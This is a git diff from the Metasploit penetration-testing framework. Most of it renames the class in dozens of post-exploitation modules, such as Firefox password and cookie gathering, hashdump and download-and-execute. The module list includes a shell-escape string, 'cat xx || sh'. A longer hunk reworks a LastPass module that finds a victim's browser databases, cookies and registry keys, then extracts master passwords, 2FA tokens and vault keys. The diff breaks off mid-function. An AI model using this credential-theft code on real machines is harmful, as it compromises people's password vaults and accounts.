Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Common include Msf::Post::Android::Priv diff --git a/modules/post/cisco/gather/enum_cisco.rb b/modules/post/cisco/gather/enum_cisco.rb index 515c7b8595..a6e54b26b8 100644 --- a/modules/post/cisco/gather/enum_cisco.rb +++ b/modules/post/cisco/gather/enum_cisco.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/auxiliary/cisco' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Cisco def initialize(info={}) super( update_info( info, diff --git a/modules/post/firefox/gather/cookies.rb b/modules/post/firefox/gather/cookies.rb index 4fc5f6cc6e..759e70c05f 100644 --- a/modules/post/firefox/gather/cookies.rb +++ b/modules/post/firefox/gather/cookies.rb @@ -6,7 +6,7 @@ require 'json' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/gather/history.rb b/modules/post/firefox/gather/history.rb index 932105e952..f35e4e02c8 100644 --- a/modules/post/firefox/gather/history.rb +++ b/modules/post/firefox/gather/history.rb @@ -6,7 +6,7 @@ require 'json' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/gather/passwords.rb b/modules/post/firefox/gather/passwords.rb index 0009613d36..714b3f5a29 100644 --- a/modules/post/firefox/gather/passwords.rb +++ b/modules/post/firefox/gather/passwords.rb @@ -7,7 +7,7 @@ require 'json' require 'msf/core' require 'msf/core/payload/firefox' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/gather/xss.rb b/modules/post/firefox/gather/xss.rb index dbe1b8a48c..978f57a9d9 100644 --- a/modules/post/firefox/gather/xss.rb +++ b/modules/post/firefox/gather/xss.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'json' require 'msf/core/payload/firefox' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Payload::Firefox include Msf::Exploit::Remote::FirefoxPrivilegeEscalation diff --git a/modules/post/firefox/manage/webcam_chat.rb b/modules/post/firefox/manage/webcam_chat.rb index 5e568c8584..ff87056b00 100644 --- a/modules/post/firefox/manage/webcam_chat.rb +++ b/modules/post/firefox/manage/webcam_chat.rb @@ -6,7 +6,7 @@ require 'json' require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Exploit::Remote::FirefoxPrivilegeEscalation include Msf::Post::WebRTC diff --git a/modules/post/linux/busybox/enum_connections.rb b/modules/post/linux/busybox/enum_connections.rb index 473c55c7de..47b2ca2e29 100644 --- a/modules/post/linux/busybox/enum_connections.rb +++ b/modules/post/linux/busybox/enum_connections.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/enum_hosts.rb b/modules/post/linux/busybox/enum_hosts.rb index 996a6f377f..0d63021bf6 100644 --- a/modules/post/linux/busybox/enum_hosts.rb +++ b/modules/post/linux/busybox/enum_hosts.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/jailbreak.rb b/modules/post/linux/busybox/jailbreak.rb index 9db686e65a..71b1d87852 100644 --- a/modules/post/linux/busybox/jailbreak.rb +++ b/modules/post/linux/busybox/jailbreak.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post METHODS = [ 'cat xx || sh', diff --git a/modules/post/linux/busybox/ping_net.rb b/modules/post/linux/busybox/ping_net.rb index 4e1191304b..84c1d280c2 100644 --- a/modules/post/linux/busybox/ping_net.rb +++ b/modules/post/linux/busybox/ping_net.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/busybox/set_dmz.rb b/modules/post/linux/busybox/set_dmz.rb index a2d109cd6b..ee86fec3ee 100644 --- a/modules/post/linux/busybox/set_dmz.rb +++ b/modules/post/linux/busybox/set_dmz.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize super( diff --git a/modules/post/linux/busybox/set_dns.rb b/modules/post/linux/busybox/set_dns.rb index 7732059d03..274b253750 100644 --- a/modules/post/linux/busybox/set_dns.rb +++ b/modules/post/linux/busybox/set_dns.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/smb_share_root.rb b/modules/post/linux/busybox/smb_share_root.rb index f89e57e6c1..4570a66659 100644 --- a/modules/post/linux/busybox/smb_share_root.rb +++ b/modules/post/linux/busybox/smb_share_root.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/busybox/wget_exec.rb b/modules/post/linux/busybox/wget_exec.rb index 38e90216a0..7a55694dc4 100644 --- a/modules/post/linux/busybox/wget_exec.rb +++ b/modules/post/linux/busybox/wget_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::BusyBox diff --git a/modules/post/linux/gather/checkvm.rb b/modules/post/linux/gather/checkvm.rb index c3085a1104..d7feb3cfdf 100644 --- a/modules/post/linux/gather/checkvm.rb +++ b/modules/post/linux/gather/checkvm.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/ecryptfs_creds.rb b/modules/post/linux/gather/ecryptfs_creds.rb index 21bbd3f3eb..ca171c856d 100644 --- a/modules/post/linux/gather/ecryptfs_creds.rb +++ b/modules/post/linux/gather/ecryptfs_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/linux/gather/enum_configs.rb b/modules/post/linux/gather/enum_configs.rb index 8e6ca7cf9d..bff25534cb 100644 --- a/modules/post/linux/gather/enum_configs.rb +++ b/modules/post/linux/gather/enum_configs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_network.rb b/modules/post/linux/gather/enum_network.rb index ba52141294..9fa3847f37 100644 --- a/modules/post/linux/gather/enum_network.rb +++ b/modules/post/linux/gather/enum_network.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/enum_protections.rb b/modules/post/linux/gather/enum_protections.rb index ab18a0c403..97d4ea05a8 100644 --- a/modules/post/linux/gather/enum_protections.rb +++ b/modules/post/linux/gather/enum_protections.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_psk.rb b/modules/post/linux/gather/enum_psk.rb index 9edc2a7ada..1afa0fbff1 100644 --- a/modules/post/linux/gather/enum_psk.rb +++ b/modules/post/linux/gather/enum_psk.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/enum_system.rb b/modules/post/linux/gather/enum_system.rb index e96331fa98..6c9b242fa4 100644 --- a/modules/post/linux/gather/enum_system.rb +++ b/modules/post/linux/gather/enum_system.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_users_history.rb b/modules/post/linux/gather/enum_users_history.rb index 6feeb24323..8eeead4bf4 100644 --- a/modules/post/linux/gather/enum_users_history.rb +++ b/modules/post/linux/gather/enum_users_history.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/linux/gather/enum_xchat.rb b/modules/post/linux/gather/enum_xchat.rb index c6a722884d..c4b236a5f4 100644 --- a/modules/post/linux/gather/enum_xchat.rb +++ b/modules/post/linux/gather/enum_xchat.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/gnome_commander_creds.rb b/modules/post/linux/gather/gnome_commander_creds.rb index ef049898e8..8956ccb5c1 100644 --- a/modules/post/linux/gather/gnome_commander_creds.rb +++ b/modules/post/linux/gather/gnome_commander_creds.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/hashdump.rb b/modules/post/linux/gather/hashdump.rb index eb049ae7da..6a18d942a1 100644 --- a/modules/post/linux/gather/hashdump.rb +++ b/modules/post/linux/gather/hashdump.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/mount_cifs_creds.rb b/modules/post/linux/gather/mount_cifs_creds.rb index ed33627410..c7ec0cf23f 100644 --- a/modules/post/linux/gather/mount_cifs_creds.rb +++ b/modules/post/linux/gather/mount_cifs_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/linux/gather/openvpn_credentials.rb b/modules/post/linux/gather/openvpn_credentials.rb index 2ca64520ce..0cd46d392e 100644 --- a/modules/post/linux/gather/openvpn_credentials.rb +++ b/modules/post/linux/gather/openvpn_credentials.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit4 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::Priv diff --git a/modules/post/linux/gather/pptpd_chap_secrets.rb b/modules/post/linux/gather/pptpd_chap_secrets.rb index cbdbfb31dd..ff663ff65f 100644 --- a/modules/post/linux/gather/pptpd_chap_secrets.rb +++ b/modules/post/linux/gather/pptpd_chap_secrets.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report diff --git a/modules/post/linux/manage/download_exec.rb b/modules/post/linux/manage/download_exec.rb index 5e15132d46..548540a9a2 100644 --- a/modules/post/linux/manage/download_exec.rb +++ b/modules/post/linux/manage/download_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System diff --git a/modules/post/multi/escalate/cups_root_file_read.rb b/modules/post/multi/escalate/cups_root_file_read.rb index 578ae8ba22..195d8fe714 100644 --- a/modules/post/multi/escalate/cups_root_file_read.rb +++ b/modules/post/multi/escalate/cups_root_file_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File LP_GROUPS = ['lpadmin', '_lpadmin'] diff --git a/modules/post/multi/escalate/metasploit_pcaplog.rb b/modules/post/multi/escalate/metasploit_pcaplog.rb index ab9535c6c3..4466a0e513 100644 --- a/modules/post/multi/escalate/metasploit_pcaplog.rb +++ b/modules/post/multi/escalate/metasploit_pcaplog.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'msf/core/exploit/local/linux' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post Rank = ManualRanking include Msf::Post::File diff --git a/modules/post/multi/gather/apple_ios_backup.rb b/modules/post/multi/gather/apple_ios_backup.rb index 31d07e1ba0..2169ad9443 100644 --- a/modules/post/multi/gather/apple_ios_backup.rb +++ b/modules/post/multi/gather/apple_ios_backup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/parser/apple_backup_manifestdb' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/check_malware.rb b/modules/post/multi/gather/check_malware.rb index 8a2104215d..a82dd47fda 100644 --- a/modules/post/multi/gather/check_malware.rb +++ b/modules/post/multi/gather/check_malware.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/http' require 'uri' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/dbvis_enum.rb b/modules/post/multi/gather/dbvis_enum.rb index 8c07940817..fd2ced019f 100644 --- a/modules/post/multi/gather/dbvis_enum.rb +++ b/modules/post/multi/gather/dbvis_enum.rb @@ -8,7 +8,7 @@ require 'msf/core/auxiliary/report' require 'openssl' require 'digest/md5' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/dns_bruteforce.rb b/modules/post/multi/gather/dns_bruteforce.rb index 3c987cc114..7a09697aa8 100644 --- a/modules/post/multi/gather/dns_bruteforce.rb +++ b/modules/post/multi/gather/dns_bruteforce.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/dns_reverse_lookup.rb b/modules/post/multi/gather/dns_reverse_lookup.rb index 8e562b4db8..cf0162c180 100644 --- a/modules/post/multi/gather/dns_reverse_lookup.rb +++ b/modules/post/multi/gather/dns_reverse_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post def initialize(info={}) super( update_info( info, diff --git a/modules/post/multi/gather/dns_srv_lookup.rb b/modules/post/multi/gather/dns_srv_lookup.rb index 3ae16da37f..4ceec2f5de 100644 --- a/modules/post/multi/gather/dns_srv_lookup.rb +++ b/modules/post/multi/gather/dns_srv_lookup.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Auxiliary::Report def initialize(info={}) diff --git a/modules/post/multi/gather/enum_vbox.rb b/modules/post/multi/gather/enum_vbox.rb index 283ffbfa7b..f9b60a3204 100644 --- a/modules/post/multi/gather/enum_vbox.rb +++ b/modules/post/multi/gather/enum_vbox.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'yaml' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/env.rb b/modules/post/multi/gather/env.rb index 34938cb19b..19d2c67538 100644 --- a/modules/post/multi/gather/env.rb +++ b/modules/post/multi/gather/env.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::Windows::Registry diff --git a/modules/post/multi/gather/fetchmailrc_creds.rb b/modules/post/multi/gather/fetchmailrc_creds.rb index 9b9de9aff2..86d97c0462 100644 --- a/modules/post/multi/gather/fetchmailrc_creds.rb +++ b/modules/post/multi/gather/fetchmailrc_creds.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/filezilla_client_cred.rb b/modules/post/multi/gather/filezilla_client_cred.rb index 736c4b9fc3..c793a9b201 100644 --- a/modules/post/multi/gather/filezilla_client_cred.rb +++ b/modules/post/multi/gather/filezilla_client_cred.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rexml/document' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/find_vmx.rb b/modules/post/multi/gather/find_vmx.rb index eb16f3e85b..0382afde76 100644 --- a/modules/post/multi/gather/find_vmx.rb +++ b/modules/post/multi/gather/find_vmx.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'yaml' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File diff --git a/modules/post/multi/gather/firefox_creds.rb b/modules/post/multi/gather/firefox_creds.rb index fde3b370a8..7afe0485f9 100644 --- a/modules/post/multi/gather/firefox_creds.rb +++ b/modules/post/multi/gather/firefox_creds.rb @@ -21,7 +21,7 @@ require 'rex' require 'msf/core/auxiliary/report' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Auxiliary::Report include Msf::Post::Windows::UserProfiles diff --git a/modules/post/multi/gather/gpg_creds.rb b/modules/post/multi/gather/gpg_creds.rb index 6c296d9118..2dd4f4a106 100644 --- a/modules/post/multi/gather/gpg_creds.rb +++ b/modules/post/multi/gather/gpg_creds.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Unix diff --git a/modules/post/multi/gather/lastpass_creds.rb b/modules/post/multi/gather/lastpass_creds.rb index 05941ee7cf..687268b39d 100644 --- a/modules/post/multi/gather/lastpass_creds.rb +++ b/modules/post/multi/gather/lastpass_creds.rb @@ -1,31 +1,40 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + require 'msf/core' -require 'base64' require 'sqlite3' require 'uri' +require 'rex' -class Metasploit3 < Msf::Post +class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Windows::UserProfiles include Msf::Post::OSX::System include Msf::Post::Unix def initialize(info = {}) - super( - update_info( - info, - 'Name' => 'LastPass Master Password Extractor', - 'Description' => 'This module extracts and decrypts LastPass master login accounts and passwords', - 'License' => MSF_LICENSE, - 'Author' => [ + super(update_info(info, + 'Name' => 'LastPass Vault Decryptor', + 'Description' => %q{ + This module extracts and decrypts LastPass master login accounts and passwords, + encryption keys, 2FA tokens and all the vault passwords + }, + 'License' => MSF_LICENSE, + 'Author' => + [ 'Alberto Garcia Illera <agarciaillera[at]gmail.com>', # original module and research 'Martin Vigo <martinvigo[at]gmail.com>', # original module and research 'Jon Hart <jon_hart[at]rapid7.com>' # module rework and cleanup ], - 'Platform' => %w(linux osx unix win), - 'References' => [['URL', 'http://www.martinvigo.com/a-look-into-lastpass/']], - 'SessionTypes' => %w(meterpreter shell) - ) - ) + 'Platform' => %w(linux osx unix win), + 'References' => + [ + [ 'URL', 'http://www.martinvigo.com/even-the-lastpass-will-be-stolen-deal-with-it' ] + ], + 'SessionTypes' => %w(meterpreter shell) + )) end def run @@ -42,129 +51,108 @@ class Metasploit3 < Msf::Post return end - print_status "Extracting credentials from #{account_map.size} LastPass databases" + print_status "Extracting credentials" + extract_credentials(account_map) - # an array of [user, encrypted password, browser] - credentials = [] # All credentials to be decrypted - account_map.each_pair do |account, browser_map| - browser_map.each_pair do |browser, paths| - if browser == 'Firefox' - paths.each do |path| - data = read_file(path) - loot_path = store_loot( - 'firefox.preferences', - 'text/javascript', - session, - data, - nil, - "Firefox preferences file #{path}" - ) + print_status "Extracting 2FA tokens" + extract_2fa_tokens(account_map) - # Extract usernames and passwords from preference file - firefox_credentials(loot_path).each do |creds| - credentials << [account, browser, URI.unescape(creds[0]), URI.unescape(creds[1])] - end - end - else # Chrome, Safari and Opera - paths.each do |path| - data = read_file(path) - loot_path = store_loot( - "#{browser.downcase}.lastpass.database", - 'application/x-sqlite3', - session, - data, - nil, - "#{account}'s #{browser} LastPass database #{path}" - ) + print_status "Extracting vault and iterations" + extract_vault_and_iterations(account_map) - # Parsing/Querying the DB - db = SQLite3::Database.new(loot_path) - lastpass_user, lastpass_pass = db.execute( - "SELECT username, password FROM LastPassSavedLogins2 " \ - "WHERE username IS NOT NULL AND username != '' " \ - "AND password IS NOT NULL AND password != '';" - ).flatten - if lastpass_user && lastpass_pass - credentials << [account, browser, lastpass_user, lastpass_pass] - end - end - end - end - end + print_status "Extracting encryption keys" + extract_vault_keys(account_map) - credentials_table = Rex::Ui::Text::Table.new( - 'Header' => "LastPass credentials", - 'Indent' => 1, - 'Columns' => %w(Account Browser LastPass_Username LastPass_Password) - ) - # Parse and decrypt credentials - credentials.each do |row| # Decrypt passwords - account, browser, user, enc_pass = row - vprint_status "Decrypting password for #{account}'s #{user} from #{browser}" - password = clear_text_password(user, enc_pass) - credentials_table << [account, browser, user, password] - end - unless credentials.empty? - print_good credentials_table.to_s - path = store_loot( - "lastpass.creds", - "text/csv", - session, - credentials_table.to_csv, - nil, - "Decrypted LastPass Master Passwords" - ) - end + print_lastpass_data(account_map) end - # Returns a mapping of { Account => { Browser => paths } } + # Returns a mapping of lastpass accounts def build_account_map platform = session.platform profiles = user_profiles - found_dbs_map = {} - - if datastore['VERBOSE'] - vprint_status "Found #{profiles.size} users: #{profiles.map { |p| p['UserName'] }.join(', ')}" - else - print_status "Found #{profiles.size} users" - end + account_map = {} profiles.each do |user_profile| account = user_profile['UserName'] browser_path_map = {} + localstorage_path_map = {} + cookies_path_map = {} case platform when /win/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\databases\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", 'Firefox' => "#{user_profile['AppData']}\\Mozilla\\Firefox\\Profiles", - 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\databases\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0", - 'Safari' => "#{user_profile['LocalAppData']}\\Apple Computer\\Safari\\Databases\\safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0" + 'IE' => "#{user_profile['LocalAppData']}Low\\LastPass", + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\databases\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0" + } + localstorage_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Local Storage\\chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", + 'Firefox' => "#{user_profile['LocalAppData']}Low\\LastPass", + 'IE' => "#{user_profile['LocalAppData']}Low\\LastPass", + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Local Storage\\chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" + } + cookies_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}\\Google\\Chrome\\User Data\\Default\\Cookies", + 'Firefox' => "", # It's set programmatically + 'IE' => "#{user_profile['LocalAppData']}\\Microsoft\\Windows\\INetCookies\\Low", + 'Opera' => "#{user_profile['AppData']}\\Opera Software\\Opera Stable\\Cookies" } when /unix|linux/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", - 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox" + 'Firefox' => "#{user_profile['LocalAppData']}/.mozilla/firefox", + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0" + } + localstorage_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", + 'Firefox' => "#{user_profile['LocalAppData']}/.lastpass", + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage" + } + cookies_path_map = { # TODO + 'Chrome' => "#{user_profile['LocalAppData']}/.config/google-chrome/Default/Cookies", + 'Firefox' => "", # It's set programmatically + 'Opera' => "#{user_profile['LocalAppData']}/.config/opera/Cookies" } when /osx/ browser_path_map = { 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/databases/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0", - 'Firefox' => "#{user_profile['LocalAppData']}\\Firefox\\Profiles", + 'Firefox' => "#{user_profile['LocalAppData']}/Firefox/Profiles", 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/databases/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0", 'Safari' => "#{user_profile['AppData']}/Safari/Databases/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0" } + localstorage_path_map = { + 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Local Storage/chrome-extension_hdokiejnpimakedhajhdlcegeplioahd_0.localstorage", + 'Firefox' => "#{user_profile['AppData']}/Containers/com.lastpass.LastPass/Data/Library/Application Support/LastPass", + 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Local Storage/chrome-extension_hnjalnkldgigidggphhmacmimbdlafdo_0.localstorage", + 'Safari' => "#{user_profile['AppData']}/Safari/LocalStorage/safari-extension_com.lastpass.lpsafariextension-n24rep3bmn_0.localstorage" + } + cookies_path_map = { # TODO + 'Chrome' => "#{user_profile['LocalAppData']}/Google/Chrome/Default/Cookies", + 'Firefox' => "", # It's set programmatically + 'Opera' => "#{user_profile['LocalAppData']}/com.operasoftware.Opera/Cookies", + 'Safari' => "#{user_profile['AppData']}/Cookies/Cookies.binarycookies" + } else print_error "Platform not recognized: #{platform}" end - found_dbs_map[account] = {} + account_map[account] = {} browser_path_map.each_pair do |browser, path| + account_map[account][browser] = {} db_paths = find_db_paths(path, browser, account) - found_dbs_map[account][browser] = db_paths unless db_paths.empty? + if db_paths && db_paths.size > 0 + account_map[account][browser]['lp_db_path'] = db_paths.first + account_map[account][browser]['localstorage_db'] = localstorage_path_map[browser] if file?(localstorage_path_map[browser]) || browser.match(/Firefox|IE/) + account_map[account][browser]['cookies_db'] = cookies_path_map[browser] if file?(cookies_path_map[browser]) || browser.match(/Firefox|IE/) + account_map[account][browser]['cookies_db'] = account_map[account][browser]['lp_db_path'].first.gsub("prefs.js", "cookies.sqlite") if (!account_map[account][browser]['lp_db_path'].blank? && browser == 'Firefox') + else + account_map[account].delete(browser) + end end end - found_dbs_map + account_map end # Returns a list of DB paths found in the victims' machine @@ -172,11 +160,14 @@ class Metasploit3 < Msf::Post paths = [] vprint_status "Checking #{account}'s #{browser}" - if browser == "Firefox" # Special case for Firefox - profiles = firefox_profile_files(path, browser) - paths |= profiles + if browser == "IE" # Special case for IE + data = read_registry_key_value('HKEY_CURRENT_USER\Software\LastPass', "LoginUsers") + data = read_registry_key_value('HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass', "LoginUsers") if data.blank? + paths |= ['HKEY_CURRENT_USER\Software\AppDataLow\Software\LastPass'] if !data.blank? && path != "Low\\LastPass" # Hacky way to detect if there is access to user's data (attacker has no root access) + elsif browser == "Firefox" # Special case for Firefox + paths |= firefox_profile_files(path) else - paths |= file_paths(path, browser, account) + paths |= file_paths(path) end vprint_good "Found #{paths.size} #{browser} databases for #{account}" @@ -188,11 +179,7 @@ class Metasploit3 < Msf::Post user_profiles = [] case session.platform when /unix|linux/ - if session.type == "meterpreter" - user_names = client.fs.dir.entries("/home") - else - user_names = session.shell_command("ls /home").split - end + user_names = dir("/home") user_names.reject! { |u| %w(. ..).include?(u) } user_names.each do |user_name| user_profiles.push('UserName' => user_name, "LocalAppData" => "/home/#{user_name}") @@ -216,25 +203,14 @@ class Metasploit3 < Msf::Post end # Extracts the databases paths from the given folder ignoring . and .. - def file_paths(path, browser, account) + def file_paths(path) found_dbs_paths = [] files = [] - if directory?(path) - sep = session.platform =~ /win/ ? '\\' : '/' - if session.type == "meterpreter" - files = client.fs.dir.entries(path) - elsif session.type == "shell" - files = session.shell_command("ls \"#{path}\"").split - else - print_error "Session type not recognized: #{session.type}" - return found_dbs_paths - end - end - + files = dir(path) if directory?(path) files.each do |file_path| unless %w(. .. Shared).include?(file_path) - found_dbs_paths.push([path, file_path].join(sep)) + found_dbs_paths.push([path, file_path].join(system_separator)) end end @@ -242,72 +218,595 @@ class Metasploit3 < Msf::Post end # Returns the profile files for Firefox - def firefox_profile_files(path, browser) + def firefox_profile_files(path) found_dbs_paths = [] if directory?(path) - sep = session.platform =~ /win/ ? '\\' : '/' - if session.type == "meterpreter" - files = client.fs.dir.entries(path) - elsif session.type == "shell" - files = session.shell_command("ls \"#{path}\"").split - else - print_error "Session type not recognized: #{session.type}" - return found_dbs_paths - end - + files = dir(path) files.reject! { |file| %w(. ..).include?(file) } files.each do |file_path| - found_dbs_paths.push([path, file_path, 'prefs.js'].join(sep)) if file_path.match(/.*\.default/) + found_dbs_paths.push([path, file_path, 'prefs.js'].join(system_separator)) if file_path.match(/.*\.default/) end end - found_dbs_paths + [found_dbs_paths] end # Parses the Firefox preferences file and returns encoded credentials - def firefox_credentials(loot_path) + def ie_firefox_credentials(prefs_path, localstorage_db_path) credentials = [] - File.readlines(loot_path).each do |line| - if 